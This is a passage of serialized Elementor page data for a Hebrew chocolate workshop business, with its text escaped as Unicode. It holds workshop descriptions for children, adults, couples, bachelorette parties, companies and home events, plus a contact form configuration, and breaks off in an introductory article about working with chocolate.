\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8132cb7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"115d6a7\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"100\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"field_type\":\"email\",\"field_label\":\"\\u05d0\\u05d9\\u05de\\u05d9\\u05d9\\u05dc - \\u05dc\\u05d0 \\u05d7\\u05d5\\u05d1\\u05d4\",\"placeholder\":\"\\u05d0\\u05d9\\u05de\\u05d9\\u05d9\\u05dc - \\u05dc\\u05d0 \\u05d7\\u05d5\\u05d1\\u05d4\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\",\"custom_id\":\"field_1\",\"_id\":\"873d3c7\"}],\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c65b0d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6b8474\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"56c7701\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 